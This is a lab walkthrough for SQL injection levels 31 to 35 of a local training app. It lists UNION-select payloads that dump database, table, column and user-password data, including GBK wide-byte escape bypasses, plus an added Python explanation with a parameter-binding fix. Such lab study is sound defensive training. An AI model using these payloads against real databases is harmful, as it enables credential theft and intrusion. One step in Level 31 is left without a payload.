Level 31
1. Determine the closing delimiter
1“”
2. Query the database name
http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,database()--+
3. Enumerate tables
http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+
4. Enumerate columns
http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+
5. Query all data in the users table
Level 32
1. Determine the closing point
1'
2. Query the database name
http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,database()%20--+
3. Enumerate tables
http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+
4. Enumerate columns
http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.columns%20where%20table_schema=database()))--+
5. Query all data in the user table
http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,group_concat(username,0,password)%20from%20users--+
Level 33
1. Determine the closure method
1'
2. Query the database name
http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,database()--+
3. Enumerate tables
http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+
4. Enumerate columns
http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+
5. Query all data in the user table
http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+
Level 34
1. Capture the request with Burp
2. Query the database name
uname=-1%df' union select 1,2#&passwd=1&submit=Submit
3. Enumerate tables
uname=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit
4. Enumerate columns
uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656D61696C73#&passwd=1&submit=Submit
5. Query all data in the user table
uname=-1%df' union select 1,group_concat(id,0x3a,email_id) from emails#&passwd=1&submit=Submit
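Why the %aa%5c%27 and %df' prefixes in Levels 32-34 defeat quote escaping, and what a bound parameter does instead. This is an added example, not code from the original page or from the lab; it assumes the application escapes byte-wise in the style of PHP addslashes() and that the database connection charset is GBK, and it uses SQLite as a stand-in for the lab's MySQL database.

```python
import sqlite3
from urllib.parse import unquote_to_bytes

# Constructed samples: the id / uname prefixes used in Levels 32-34 on this page.
SAMPLES = ["-1%aa%5c%27", "-1%df'"]

def addslashes(raw: bytes) -> bytes:
    """Byte-wise escaping in the style of PHP addslashes(); it is unaware of charsets."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)                # prepend a backslash
        out.append(0x30 if b == 0 else b)   # NUL is written as \0
    return bytes(out)

def unescaped_quotes(escaped: bytes, charset: str) -> int:
    """Count single quotes left unescaped once the bytes are read as `charset`."""
    text = escaped.decode(charset, errors="replace")
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2                          # a backslash consumes the next character
            continue
        count += text[i] == "'"
        i += 1
    return count

def escaping_holds(param: str, charset: str) -> bool:
    """True if every quote in the escaped parameter stays escaped under `charset`."""
    return unescaped_quotes(addslashes(unquote_to_bytes(param)), charset) == 0

def lookup_bound(param: str) -> list:
    """Mitigation: bind the value so it never reaches the SQL parser as query text."""
    db = sqlite3.connect(":memory:")        # assumption: stand-in for the lab database
    db.execute("CREATE TABLE users (id TEXT, username TEXT)")
    db.execute("INSERT INTO users VALUES ('1', 'constructed-user')")
    value = unquote_to_bytes(param).decode("gbk", errors="replace")
    return db.execute("SELECT username FROM users WHERE id = ?", (value,)).fetchall()

if __name__ == "__main__":
    for s in SAMPLES:
        print(s, "| gbk holds:", escaping_holds(s, "gbk"),
              "| latin-1 holds:", escaping_holds(s, "latin-1"),
              "| bound rows:", lookup_bound(s + " union select 1,2"))
```

Under GBK the lead byte (0xAA or 0xDF) pairs with the following 0x5C into one two-byte character, so the backslash that was meant to escape the quote disappears; with a bound parameter the same input is only ever compared as a value.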
Level 35
1. Query the database name
http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,database()--+
2. Enumerate tables
http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+
3. Enumerate columns
http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+
4. Query all data in the user table
http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+